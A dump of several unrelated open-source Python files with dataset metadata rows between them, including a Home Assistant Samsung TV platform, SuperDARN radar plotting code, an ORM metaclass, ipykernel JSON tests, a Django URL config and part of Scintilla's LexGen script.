vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
})
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Samsung TV platform."""
known_devices = hass.data.get(KNOWN_DEVICES_KEY)
if known_devices is None:
known_devices = set()
hass.data[KNOWN_DEVICES_KEY] = known_devices
# Is this a manual configuration?
if config.get(CONF_HOST) is not None:
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
name = config.get(CONF_NAME)
timeout = config.get(CONF_TIMEOUT)
elif discovery_info is not None:
tv_name, model, host = discovery_info
name = "{} ({})".format(tv_name, model)
port = DEFAULT_PORT
timeout = DEFAULT_TIMEOUT
else:
_LOGGER.warning(
'Internal error on samsungtv component. Cannot determine device')
return
# Only add a device once, so discovered devices do not override manual
# config.
ip_addr = socket.gethostbyname(host)
if ip_addr not in known_devices:
known_devices.add(ip_addr)
add_devices([SamsungTVDevice(host, port, name, timeout)])
_LOGGER.info("Samsung TV %s:%d added as '%s'", host, port, name)
else:
_LOGGER.info("Ignoring duplicate Samsung TV %s:%d", host, port)
class SamsungTVDevice(MediaPlayerDevice):
"""Representation of a Samsung TV."""
def __init__(self, host, port, name, timeout):
"""Initialize the Samsung device."""
from samsungctl import exceptions
from samsungctl import Remote
# Save a reference to the imported classes
self._exceptions_class = exceptions
self._remote_class = Remote
self._name = name
# Assume that the TV is not muted
self._muted = False
# Assume that the TV is in Play mode
self._playing = True
self._state = STATE_UNKNOWN
self._remote = None
# Generate a configuration for the Samsung library
self._config = {
'name': 'HomeAssistant',
'description': name,
'id': 'ha.component.samsung',
'port': port,
'host': host,
'timeout': timeout,
}
if self._config['port'] == 8001:
self._config['method'] = 'websocket'
else:
self._config['method'] = 'legacy'
def update(self):
"""Retrieve the latest data."""
# Send an empty key to see if we are still connected
return self.send_key('KEY')
def get_remote(self):
"""Create or return a remote control instance."""
if self._remote is None:
# We need to create a new instance to reconnect.
self._remote = self._remote_class(self._config)
return self._remote
def send_key(self, key):
"""Send a key to the tv and handles exceptions."""
try:
self.get_remote().control(key)
self._state = STATE_ON
except (self._exceptions_class.UnhandledResponse,
self._exceptions_class.AccessDenied, BrokenPipeError):
            # We got a response so it's on.
            # BrokenPipeError can occur when commands are sent too fast
self._state = STATE_ON
self._remote = None
return False
except (self._exceptions_class.ConnectionClosed, OSError):
self._state = STATE_OFF
self._remote = None
return False
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return self._muted
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_SAMSUNGTV
def turn_off(self):
"""Turn off media player."""
if self._config['method'] == 'websocket':
self.send_key('KEY_POWER')
else:
self.send_key('KEY_POWEROFF')
# Force closing of remote session to provide instant UI feedback
self.get_remote().close()
def volume_up(self):
"""Volume up the media player."""
self.send_key('KEY_VOLUP')
def volume_down(self):
"""Volume down media player."""
self.send_key('KEY_VOLDOWN')
def mute_volume(self, mute):
"""Send mute command."""
self.send_key('KEY_MUTE')
def media_play_pause(self):
"""Simulate play pause media player."""
if self._playing:
self.media_pause()
else:
self.media_play()
def media_play(self):
"""Send play command."""
self._playing = True
self.send_key('KEY_PLAY')
def media_pause(self):
"""Send media pause command to media player."""
self._playing = False
self.send_key('KEY_PAUSE')
def media_next_track(self):
"""Send next track command."""
self.send_key('KEY_FF')
def media_previous_track(self):
"""Send the previous track command."""
self.send_key('KEY_REWIND')
def turn_on(self):
"""Turn the media player on."""
self.send_key('KEY_POWERON')
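# Illustrative usage sketch (hedged): the platform is normally set up by Home
# Assistant itself. The host, port and name values below are placeholders, and
# `hass`/`add_devices` are supplied by the framework, not defined here.
#
#     conf = {CONF_HOST: '192.168.1.10', CONF_PORT: 8001,
#             CONF_NAME: 'Living Room TV', CONF_TIMEOUT: DEFAULT_TIMEOUT}
#     setup_platform(hass, conf, add_devices)  # port 8001 selects the websocket method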
| 31.533019
| 77
| 0.638893
|
794ff0e78e65da514e612b51f968f8d4471422a9
| 10,899
|
py
|
Python
|
sd/sd_plots.py
|
shibaji7/AMGeO-SD
|
f7380271affa191f0444289e4663bcd54f36cc9b
|
[
"MIT"
] | 1
|
2020-12-02T20:13:18.000Z
|
2020-12-02T20:13:18.000Z
|
sd/sd_plots.py
|
shibaji7/AMGeO-SD
|
f7380271affa191f0444289e4663bcd54f36cc9b
|
[
"MIT"
] | null | null | null |
sd/sd_plots.py
|
shibaji7/AMGeO-SD
|
f7380271affa191f0444289e4663bcd54f36cc9b
|
[
"MIT"
] | 3
|
2020-07-08T17:03:38.000Z
|
2020-07-08T19:03:40.000Z
|
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter, num2date
from matplotlib import patches
import matplotlib.patches as mpatches
import random
import pytz
import datetime as dt
import pandas as pd
import utils
CLUSTER_CMAP = plt.cm.gist_rainbow
def get_cluster_cmap(n_clusters, plot_noise=False):
cmap = CLUSTER_CMAP
cmaplist = [cmap(i) for i in range(cmap.N)]
while len(cmaplist) < n_clusters:
cmaplist.extend([cmap(i) for i in range(cmap.N)])
cmaplist = np.array(cmaplist)
r = np.array(range(len(cmaplist)))
random.seed(10)
random.shuffle(r)
cmaplist = cmaplist[r]
if plot_noise:
cmaplist[0] = (0, 0, 0, 1.0) # black for noise
rand_cmap = cmap.from_list("Cluster cmap", cmaplist, len(cmaplist))
return rand_cmap
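# Illustrative usage sketch (hedged): build a shuffled categorical colormap for,
# e.g., 12 clusters plus a black "noise" entry; 12 is an arbitrary example count.
#
#     noise_cmap = get_cluster_cmap(12, plot_noise=True)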
class RangeTimePlot(object):
"""
Create plots for IS/GS flags, velocity, and algorithm clusters.
"""
def __init__(self, nrang, unique_times, fig_title, num_subplots=3):
self.nrang = nrang
self.unique_gates = np.linspace(1, nrang, nrang)
self.unique_times = unique_times
self.num_subplots = num_subplots
self._num_subplots_created = 0
self.fig = plt.figure(figsize=(8, 3*num_subplots), dpi=100) # Size for website
plt.suptitle(fig_title, x=0.075, y=0.95, ha="left", fontweight="bold", fontsize=15)
mpl.rcParams.update({"font.size": 10})
return
def addParamPlot(self, df, beam, title, p_max=100, p_min=-100, p_step=25, xlabel="Time UT", ylabel="Range gate", zparam="v",
label="Velocity [m/s]", ax=None, fig=None, addcb=True, ss_obj=None):
if ax is None: ax = self._add_axis()
df = df[df.bmnum==beam]
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam=zparam)
bounds = list(range(p_min, p_max+1, p_step))
cmap = plt.cm.jet
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
# cmap.set_bad("w", alpha=0.0)
# Configure axes
ax.xaxis.set_major_formatter(DateFormatter("%H:%M"))
hours = mdates.HourLocator(byhour=range(0, 24, 4))
ax.xaxis.set_major_locator(hours)
ax.set_xlabel(xlabel, fontdict={"size":12, "fontweight": "bold"})
ax.set_xlim([self.unique_times[0], self.unique_times[-1]])
ax.set_ylim([0, self.nrang])
ax.set_ylabel(ylabel, fontdict={"size":12, "fontweight": "bold"})
cax = ax.pcolormesh(X, Y, Z.T, lw=0.01, edgecolors="None", cmap=cmap, norm=norm)
if fig is None: fig = self.fig
if addcb:
cbar = fig.colorbar(cax, ax=ax, shrink=0.7,
ticks=bounds,
spacing="uniform",
orientation="vertical")
cbar.set_label(label)
#self._add_colorbar(fig, ax, bounds, cmap, label=label)
ax.set_title(title, loc="left", fontdict={"fontweight": "bold"})
if ss_obj: self.lay_sunrise_sunset(ax, ss_obj)
return ax
def addCluster(self, df, beam, title, xlabel="", ylabel="Range gate", label_clusters=True, skill=None, ax=None, ss_obj=None):
# add new axis
if ax is None: ax = self._add_axis()
df = df[df.bmnum==beam]
unique_labs = np.sort(np.unique(df.labels))
for i, j in zip(range(len(unique_labs)), unique_labs):
if j > 0:
df["labels"]=np.where(df["labels"]==j, i, df["labels"])
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam="labels")
flags = df.labels
if -1 in flags:
cmap = get_cluster_cmap(len(np.unique(flags)), plot_noise=True) # black for noise
else:
cmap = get_cluster_cmap(len(np.unique(flags)), plot_noise=False)
# Lower bound for cmap is inclusive, upper bound is non-inclusive
bounds = list(range( len(np.unique(flags)) )) # need (max_cluster+1) to be the upper bound
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
ax.xaxis.set_major_formatter(DateFormatter("%H:%M"))
hours = mdates.HourLocator(byhour=range(0, 24, 4))
ax.xaxis.set_major_locator(hours)
ax.set_xlabel(xlabel, fontdict={"size":12, "fontweight": "bold"})
ax.set_xlim([self.unique_times[0], self.unique_times[-1]])
ax.set_ylim([0, self.nrang])
ax.set_ylabel(ylabel, fontdict={"size":12, "fontweight": "bold"})
ax.pcolormesh(X, Y, Z.T, lw=0.01, edgecolors="None", cmap=cmap, norm=norm)
ax.set_title(title, loc="left", fontdict={"fontweight": "bold"})
if skill is not None:
txt = r"CH = %.1f, BH = %.1f $\times 10^{6}$"%(skill.chscore, skill.bhscore/1e6) +"\n"+\
"H = %.1f, Xu = %.1f"%(skill.hscore, skill.xuscore)
ax.text(0.8, 0.8, txt, horizontalalignment="center",
verticalalignment="center", transform=ax.transAxes)
if label_clusters:
num_flags = len(np.unique(flags))
for f in np.unique(flags):
flag_mask = Z.T==f
g = Y[flag_mask].astype(int)
t_c = X[flag_mask]
# Only label clusters large enough to be distinguishable on RTI map,
# OR label all clusters if there are few
if (len(t_c) > 250 or
(num_flags < 50 and len(t_c) > 0)) \
and f != -1:
m = int(len(t_c) / 2) # Time is sorted, so this is roughly the index of the median time
ax.text(t_c[m], g[m], str(int(f)), fontdict={"size": 8, "fontweight": "bold"}) # Label cluster #
return ax
def addGSIS(self, df, beam, title, xlabel="", ylabel="Range gate", zparam="gflg_0",
clusters=None, label_clusters=False, ax=None, ss_obj=None):
# add new axis
if ax is None: ax = self._add_axis()
df = df[df.bmnum==beam]
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam=zparam,)
flags = np.array(df[zparam]).astype(int)
if -1 in flags and 2 in flags: # contains noise flag
cmap = mpl.colors.ListedColormap([(0.0, 0.0, 0.0, 1.0), # black
                                              (1.0, 0.0, 0.0, 1.0), # red
                                              (0.0, 0.0, 1.0, 1.0), # blue
(0.0, 1.0, 0.0, 1.0)]) # green
bounds = [-1, 0, 1, 2, 3] # Lower bound inclusive, upper bound non-inclusive
handles = [mpatches.Patch(color="red", label="IS"), mpatches.Patch(color="blue", label="GS"),
mpatches.Patch(color="black", label="US"), mpatches.Patch(color="green", label="SAIS")]
elif -1 in flags and 2 not in flags:
cmap = mpl.colors.ListedColormap([(0.0, 0.0, 0.0, 1.0), # black
                                              (1.0, 0.0, 0.0, 1.0), # red
                                              (0.0, 0.0, 1.0, 1.0)]) # blue
bounds = [-1, 0, 1, 2] # Lower bound inclusive, upper bound non-inclusive
handles = [mpatches.Patch(color="red", label="IS"), mpatches.Patch(color="blue", label="GS"),
mpatches.Patch(color="black", label="US")]
else:
            cmap = mpl.colors.ListedColormap([(1.0, 0.0, 0.0, 1.0), # red
                                              (0.0, 0.0, 1.0, 1.0)]) # blue
bounds = [0, 1, 2] # Lower bound inclusive, upper bound non-inclusive
handles = [mpatches.Patch(color="red", label="IS"), mpatches.Patch(color="blue", label="GS")]
norm = mpl.colors.BoundaryNorm(bounds, cmap.N)
ax.xaxis.set_major_formatter(DateFormatter("%H:%M"))
hours = mdates.HourLocator(byhour=range(0, 24, 4))
ax.xaxis.set_major_locator(hours)
ax.set_xlabel(xlabel, fontdict={"size":12, "fontweight": "bold"})
ax.set_xlim([self.unique_times[0], self.unique_times[-1]])
ax.set_ylim([0, self.nrang])
ax.set_ylabel(ylabel, fontdict={"size":12, "fontweight": "bold"})
ax.pcolormesh(X, Y, Z.T, lw=0.01, edgecolors="None", cmap=cmap, norm=norm)
ax.set_title(title, loc="left", fontdict={"fontweight": "bold"})
ax.legend(handles=handles, loc=4)
if label_clusters:
flags = df.labels
num_flags = len(np.unique(flags))
X, Y, Z = utils.get_gridded_parameters(df, xparam="time", yparam="slist", zparam="labels")
for f in np.unique(flags):
flag_mask = Z.T==f
g = Y[flag_mask].astype(int)
t_c = X[flag_mask]
# Only label clusters large enough to be distinguishable on RTI map,
# OR label all clusters if there are few
if (len(t_c) > 250 or
(num_flags < 100 and len(t_c) > 0)) \
and f != -1:
tct = ""
m = int(len(t_c) / 2) # Time is sorted, so this is roughly the index of the median time
if clusters[beam][int(f)]["type"] == "IS": tct = "%.1f IS"%((1-clusters[beam][int(f)]["auc"])*100)
if clusters[beam][int(f)]["type"] == "GS": tct = "%.1f GS"%(clusters[beam][int(f)]["auc"]*100)
ax.text(t_c[m], g[m], tct, fontdict={"size": 8, "fontweight": "bold", "color":"gold"}) # Label cluster #
return ax
def save(self, filepath):
self.fig.savefig(filepath, bbox_inches="tight")
def close(self):
self.fig.clf()
plt.close()
# Private helper functions
def _add_axis(self):
self._num_subplots_created += 1
ax = self.fig.add_subplot(self.num_subplots, 1, self._num_subplots_created)
ax.tick_params(axis="both", labelsize=12)
return ax
def _add_colorbar(self, fig, ax, bounds, colormap, label=""):
"""
Add a colorbar to the right of an axis.
:param fig:
:param ax:
:param bounds:
:param colormap:
:param label:
:return:
"""
import matplotlib as mpl
pos = ax.get_position()
cpos = [pos.x1 + 0.025, pos.y0 + 0.0125,
                0.015, pos.height * 0.4] # this list defines (left, bottom, width, height)
cax = fig.add_axes(cpos)
norm = mpl.colors.BoundaryNorm(bounds, colormap.N)
cb2 = mpl.colorbar.ColorbarBase(cax, cmap=colormap,
norm=norm,
ticks=bounds,
spacing="uniform",
orientation="vertical")
cb2.set_label(label)
return
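# Illustrative usage sketch (hedged): `beam_df` stands for a beam-sounding
# DataFrame with the columns used above (time, bmnum, slist, v, ...) and `times`
# for the list of unique scan times; both are placeholders, not defined here.
#
#     rtp = RangeTimePlot(nrang=75, unique_times=times, fig_title="Example RTI", num_subplots=2)
#     rtp.addParamPlot(beam_df, beam=7, title="Velocity")
#     rtp.addGSIS(beam_df, beam=7, title="IS/GS flags")
#     rtp.save("example_rti.png")
#     rtp.close()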
| 48.874439
| 129
| 0.556473
|
794ff10ea4136d67db70e1e70fe82e6e415f34fe
| 934
|
py
|
Python
|
thermosteam/utils/__init__.py
|
yoelcortes/thermotree
|
7d7c045ed7324ff7fd69188f3176207be08d7070
|
[
"MIT"
] | 2
|
2020-01-10T14:23:08.000Z
|
2020-02-21T20:36:49.000Z
|
thermosteam/utils/__init__.py
|
yoelcortes/thermotree
|
7d7c045ed7324ff7fd69188f3176207be08d7070
|
[
"MIT"
] | 3
|
2019-12-09T08:10:41.000Z
|
2019-12-09T08:40:52.000Z
|
thermosteam/utils/__init__.py
|
yoelcortes/thermotree
|
7d7c045ed7324ff7fd69188f3176207be08d7070
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# BioSTEAM: The Biorefinery Simulation and Techno-Economic Analysis Modules
# Copyright (C) 2020-2021, Yoel Cortes-Pena <yoelcortes@gmail.com>
#
# This module is under the UIUC open-source license. See
# github.com/BioSTEAMDevelopmentGroup/biosteam/blob/master/LICENSE.txt
# for license details.
"""
"""
from . import pickle
from . import representation
from . import decorators
from . import other
from . import cache
from . import registry
from . import colors
from . import plots
__all__ = (*pickle.__all__,
*representation.__all__,
*decorators.__all__,
*other.__all__,
*cache.__all__,
*registry.__all__,
*colors.__all__,
*plots.__all__,
)
from .pickle import *
from .representation import *
from .decorators import *
from .other import *
from .cache import *
from .registry import *
from .colors import *
from .plots import *
| 25.944444
| 75
| 0.691649
|
794ff33c2bc40452dcb98d0453cfb34711510d76
| 2,736
|
py
|
Python
|
pyal3dtf/plotting.py
|
petebachant/NACA0020-3D-OpenFOAM
|
ddb7105d534f859bb19ff1e0bb9be39c3ae7943f
|
[
"MIT"
] | 1
|
2021-08-16T03:32:48.000Z
|
2021-08-16T03:32:48.000Z
|
pyal3dtf/plotting.py
|
petebachant/actuatorLine-3D-turbinesFoam
|
ddb7105d534f859bb19ff1e0bb9be39c3ae7943f
|
[
"MIT"
] | 2
|
2015-10-17T01:01:53.000Z
|
2015-10-17T20:43:29.000Z
|
pyal3dtf/plotting.py
|
petebachant/NACA0020-3D-OpenFOAM
|
ddb7105d534f859bb19ff1e0bb9be39c3ae7943f
|
[
"MIT"
] | null | null | null |
"""
Plotting functions.
"""
import numpy as np
import matplotlib.pyplot as plt
from . import processing as pr
import os
def plot_spanwise_pressure(ax=None, simtype="BR", save=False):
"""Plot spanwise pressure, normalized and inverted."""
df = pr.load_sampled_set("spanwise", "p", simtype=simtype)
df["p_norm"] = -df.p
df.p_norm -= df.p_norm.min()
df.p_norm /= df.p_norm.max()
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, df.p_norm)
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$-\hat{p}$")
try:
fig.tight_layout()
except UnboundLocalError:
pass
if save:
savefig(fig=fig, name="spanwise-pressure-" + simtype)
def plot_alpha(ax=None):
"""Plot angle of attack versus vertical coordinate."""
df = pr.load_sampled_velocity(name="inflow")
pitch = pr.read_alpha_deg()
df["alpha_deg"] = pitch - np.rad2deg(np.tan(df.U_1/df.U_0))
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, -df.alpha_deg)
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$\alpha$ (degrees)")
def plot_inflow(ax=None, component=None):
"""Plot inflow velocity magnitude versus vertical coordinate."""
df = pr.load_sampled_velocity(name="inflow")
if component is None:
vel = np.sqrt(df.U_0**2 + df.U_1**2)
ylabel = r"$|U_\mathrm{in}|$"
else:
vel = df["U_" + str(component)]
ylabel = r"$U_{}$".format(component)
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, vel)
ax.set_xlabel("$z/H$")
ax.set_ylabel(ylabel)
def plot_trailing_vorticity(ax=None, simtype="BR", save=False):
"""Plot trailing vorticity versus vertical coordinate."""
df = pr.load_sampled_vorticity(name="trailing", simtype=simtype)
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, df.vorticity_2)
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$\omega_z$")
try:
fig.tight_layout()
except UnboundLocalError:
pass
if save:
savefig(fig=fig, name="trailing-vorticity-" + simtype)
def plot_trailing_velocity(ax=None, component=0, simtype="BR"):
"""Plot trailing velocity versus vertical coordinate."""
df = pr.load_sampled_velocity(name="trailing", simtype=simtype)
if ax is None:
fig, ax = plt.subplots()
ax.plot(df.z, df["U_" + str(component)])
ax.set_xlabel("$z/H$")
ax.set_ylabel(r"$U_{}$".format(component))
def savefig(fig=None, name=None):
"""Save to `figures` directory as PDF and PNG."""
if not os.path.isdir("figures"):
os.mkdir("figures")
if fig is not None:
plt = fig
plt.savefig("figures/{}.pdf".format(name))
plt.savefig("figures/{}.png".format(name), dpi=300)
| 29.73913
| 68
| 0.625731
|
794ff6bc1e17b53cea6c1471bd86225b63a69b94
| 2,157
|
py
|
Python
|
orm/modelmeta.py
|
theikkila/lopputili
|
25842e54a272f12ae6bdafeb98c676da396cddf2
|
[
"MIT"
] | null | null | null |
orm/modelmeta.py
|
theikkila/lopputili
|
25842e54a272f12ae6bdafeb98c676da396cddf2
|
[
"MIT"
] | null | null | null |
orm/modelmeta.py
|
theikkila/lopputili
|
25842e54a272f12ae6bdafeb98c676da396cddf2
|
[
"MIT"
] | null | null | null |
from . import fields
from . import descriptors
import weakref
import copy
'''
This is the most magical part of the orm.
The metaclass constructs other classes: in practice it converts Models
from their nice declarative format into working ones.
'''
class ModelMeta(type):
def __new__(cls, name, based, attributes):
# Always add primary key field
if 'pk' not in attributes:
attributes['pk'] = fields.PKField()
new_attributes = {}
new_attributes['fields'] = []
new_attributes['metafields'] = []
# Iterate through attributes (model fields)
for attrib_name in attributes:
attribute = attributes[attrib_name]
if isinstance(attribute, fields.Field):
new_attributes['fields'].append(attrib_name)
new_attributes['_'+attrib_name] = attribute
                # This assigns a descriptor in the field's place and moves the original field instance to a _<field> attribute
if isinstance(attribute, fields.ForeignKeyField):
new_attributes[attrib_name] = descriptors.ForeignFieldDescriptor(attrib_name)
else:
new_attributes[attrib_name] = descriptors.FieldDescriptor(attrib_name)
elif isinstance(attribute, fields.MetaField):
# Metafields like related-objects are not real fields so they are handled differently
new_attributes['metafields'].append(attrib_name)
new_attributes['_'+attrib_name] = attribute
new_attributes[attrib_name] = descriptors.HasFieldDescriptor(attrib_name)
else:
new_attributes[attrib_name] = attribute
return super(ModelMeta, cls).__new__(cls, name, based, new_attributes)
'''
This class is constructed by the metaclass. In its constructor all of the
class-level field instances are copied so that model instances do not merely
share references to the same field objects.
'''
class BaseMetaModel(object, metaclass=ModelMeta):
def __init__(self, *args, **kwargs):
self._self = self
#super(BaseMetaModel, self).__init__()
for field in self.fields:
setattr(self, '_'+field, copy.deepcopy(getattr(self, '_'+field)))
for metafield in self.metafields:
setattr(self, '_'+metafield, copy.copy(getattr(self, '_'+metafield)))
f = getattr(self, '_'+metafield)
self.setFieldModel(f)
def setFieldModel(self, f):
f.setModel(self)
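# Illustrative usage sketch (hedged): a declarative model subclasses BaseMetaModel.
# The concrete field classes named below (e.g. a CharField-style field) are
# hypothetical stand-ins, since only PKField, ForeignKeyField and the Field/MetaField
# bases appear in this file.
#
#     class Account(BaseMetaModel):
#         name = fields.CharField()          # hypothetical concrete Field subclass
#         owner = fields.ForeignKeyField()   # wrapped by ForeignFieldDescriptor
#
#     acc = Account()
#     acc.name = "savings"                   # goes through FieldDescriptor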
| 35.360656
| 100
| 0.749189
|
794ff6c96f42878f3980d36575e533c3821fed9b
| 3,335
|
py
|
Python
|
env/lib/python3.5/site-packages/ipykernel/tests/test_jsonutil.py
|
riordan/who-owns-what
|
62538fdb6d40ed1e0cdafb0df388be95fb388907
|
[
"Apache-2.0"
] | 4
|
2018-01-19T17:15:06.000Z
|
2018-01-24T00:06:42.000Z
|
ipykernel/tests/test_jsonutil.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 10
|
2017-07-13T00:24:03.000Z
|
2017-07-17T07:39:03.000Z
|
ipykernel/tests/test_jsonutil.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 7
|
2017-08-01T04:02:07.000Z
|
2018-10-06T21:07:20.000Z
|
# coding: utf-8
"""Test suite for our JSON utilities."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import sys
if sys.version_info < (3,):
from base64 import decodestring as decodebytes
else:
from base64 import decodebytes
from datetime import datetime
import numbers
import nose.tools as nt
from .. import jsonutil
from ..jsonutil import json_clean, encode_images
from ipython_genutils.py3compat import unicode_to_str, str_to_bytes, iteritems
class MyInt(object):
def __int__(self):
return 389
numbers.Integral.register(MyInt)
class MyFloat(object):
def __float__(self):
return 3.14
numbers.Real.register(MyFloat)
def test():
# list of input/expected output. Use None for the expected output if it
# can be the same as the input.
pairs = [(1, None), # start with scalars
(1.0, None),
('a', None),
(True, None),
(False, None),
(None, None),
# Containers
([1, 2], None),
((1, 2), [1, 2]),
(set([1, 2]), [1, 2]),
(dict(x=1), None),
({'x': 1, 'y':[1,2,3], '1':'int'}, None),
# More exotic objects
((x for x in range(3)), [0, 1, 2]),
(iter([1, 2]), [1, 2]),
(datetime(1991, 7, 3, 12, 00), "1991-07-03T12:00:00.000000"),
(MyFloat(), 3.14),
(MyInt(), 389)
]
for val, jval in pairs:
if jval is None:
jval = val
out = json_clean(val)
# validate our cleanup
nt.assert_equal(out, jval)
# and ensure that what we return, indeed encodes cleanly
json.loads(json.dumps(out))
def test_encode_images():
# invalid data, but the header and footer are from real files
pngdata = b'\x89PNG\r\n\x1a\nblahblahnotactuallyvalidIEND\xaeB`\x82'
jpegdata = b'\xff\xd8\xff\xe0\x00\x10JFIFblahblahjpeg(\xa0\x0f\xff\xd9'
pdfdata = b'%PDF-1.\ntrailer<</Root<</Pages<</Kids[<</MediaBox[0 0 3 3]>>]>>>>>>'
fmt = {
'image/png' : pngdata,
'image/jpeg' : jpegdata,
'application/pdf' : pdfdata
}
encoded = encode_images(fmt)
for key, value in iteritems(fmt):
# encoded has unicode, want bytes
decoded = decodebytes(encoded[key].encode('ascii'))
nt.assert_equal(decoded, value)
encoded2 = encode_images(encoded)
nt.assert_equal(encoded, encoded2)
b64_str = {}
for key, encoded in iteritems(encoded):
b64_str[key] = unicode_to_str(encoded)
encoded3 = encode_images(b64_str)
nt.assert_equal(encoded3, b64_str)
for key, value in iteritems(fmt):
# encoded3 has str, want bytes
decoded = decodebytes(str_to_bytes(encoded3[key]))
nt.assert_equal(decoded, value)
def test_lambda():
with nt.assert_raises(ValueError):
json_clean(lambda : 1)
def test_exception():
bad_dicts = [{1:'number', '1':'string'},
{True:'bool', 'True':'string'},
]
for d in bad_dicts:
nt.assert_raises(ValueError, json_clean, d)
def test_unicode_dict():
data = {u'üniço∂e': u'üniço∂e'}
clean = jsonutil.json_clean(data)
nt.assert_equal(data, clean)
| 29.254386
| 85
| 0.592504
|
794ff983897603df7d758424f71cf9f82fdac15e
| 428
|
py
|
Python
|
config/urls.py
|
Mohammad-Abdul-Ghafour/DjangoX-project
|
f84e0ee9b8092ab2384106248f8943f99a614c63
|
[
"MIT"
] | null | null | null |
config/urls.py
|
Mohammad-Abdul-Ghafour/DjangoX-project
|
f84e0ee9b8092ab2384106248f8943f99a614c63
|
[
"MIT"
] | null | null | null |
config/urls.py
|
Mohammad-Abdul-Ghafour/DjangoX-project
|
f84e0ee9b8092ab2384106248f8943f99a614c63
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('page/', include('pages.urls')),
path('', include('emplyees.urls')),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
| 25.176471
| 56
| 0.67757
|
794ffaa8238503940fa20d88ac77a32dc0791793
| 6,904
|
py
|
Python
|
dep/scintilla/scintilla-3.21.0/scripts/LexGen.py
|
Matt-Soft/gitahead
|
4be5639202b1354cbe244cd37db90efabb5106b8
|
[
"MIT"
] | 1,626
|
2018-12-15T12:07:00.000Z
|
2022-03-31T15:08:04.000Z
|
dep/scintilla/scintilla-3.21.0/scripts/LexGen.py
|
Matt-Soft/gitahead
|
4be5639202b1354cbe244cd37db90efabb5106b8
|
[
"MIT"
] | 541
|
2018-12-10T21:33:40.000Z
|
2022-03-25T02:25:02.000Z
|
dep/scintilla/scintilla-3.21.0/scripts/LexGen.py
|
Matt-Soft/gitahead
|
4be5639202b1354cbe244cd37db90efabb5106b8
|
[
"MIT"
] | 270
|
2018-12-27T21:37:26.000Z
|
2022-03-31T23:00:06.000Z
|
#!/usr/bin/env python
# LexGen.py - implemented 2002 by Neil Hodgson neilh@scintilla.org
# Released to the public domain.
# Regenerate the Scintilla source files that list all the lexers.
# Should be run whenever a new lexer is added or removed.
# Requires Python 2.5 or later
# Files are regenerated in place with templates stored in comments.
# The format of generation comments is documented in FileGenerator.py.
from FileGenerator import Regenerate, UpdateLineInFile, \
ReplaceREInFile, UpdateLineInPlistFile, ReadFileAsList, UpdateFileFromLines, \
FindSectionInList
import ScintillaData
import HFacer
import os
import uuid
import sys
baseDirectory = os.path.dirname(os.path.dirname(ScintillaData.__file__))
sys.path.insert(0, baseDirectory)
import win32.DepGen
import gtk.DepGen
def UpdateVersionNumbers(sci, root):
UpdateLineInFile(root + "win32/ScintRes.rc", "#define VERSION_SCINTILLA",
"#define VERSION_SCINTILLA \"" + sci.versionDotted + "\"")
UpdateLineInFile(root + "win32/ScintRes.rc", "#define VERSION_WORDS",
"#define VERSION_WORDS " + sci.versionCommad)
UpdateLineInFile(root + "qt/ScintillaEditBase/ScintillaEditBase.pro",
"VERSION =",
"VERSION = " + sci.versionDotted)
UpdateLineInFile(root + "qt/ScintillaEdit/ScintillaEdit.pro",
"VERSION =",
"VERSION = " + sci.versionDotted)
UpdateLineInFile(root + "doc/ScintillaDownload.html", " Release",
" Release " + sci.versionDotted)
ReplaceREInFile(root + "doc/ScintillaDownload.html",
r"(/sourceforge.net/projects/scintilla/files/scintilla/)[\d\.]+(/[a-zA-Z]+)\d+",
r"\g<1>" + sci.versionDotted + "\g<2>" + sci.version)
UpdateLineInFile(root + "doc/index.html",
' <font color="#FFCC99" size="3"> Release version',
' <font color="#FFCC99" size="3"> Release version ' +\
sci.versionDotted + '<br />')
UpdateLineInFile(root + "doc/index.html",
' Site last modified',
' Site last modified ' + sci.mdyModified + '</font>')
ReplaceREInFile(root + "doc/ScintillaHistory.html",
r"(/sourceforge.net/projects/scintilla/files/scintilla/)[\d\.]+(/[a-zA-Z]+)\d+",
r"\g<1>" + sci.versionDotted + "\g<2>" + sci.version,
count=1)
ReplaceREInFile(root + "doc/ScintillaHistory.html",
r">Release [\d\.]+<", ">Release " + sci.versionDotted + "<", count=1)
UpdateLineInFile(root + "doc/ScintillaHistory.html",
' Released ',
' Released ' + sci.dmyModified + '.')
UpdateLineInPlistFile(root + "cocoa/ScintillaFramework/Info.plist",
"CFBundleVersion", sci.versionDotted)
UpdateLineInPlistFile(root + "cocoa/ScintillaFramework/Info.plist",
"CFBundleShortVersionString", sci.versionDotted)
UpdateLineInFile(root + "LongTermDownload.html", " Release",
" Release " + sci.versionDotted)
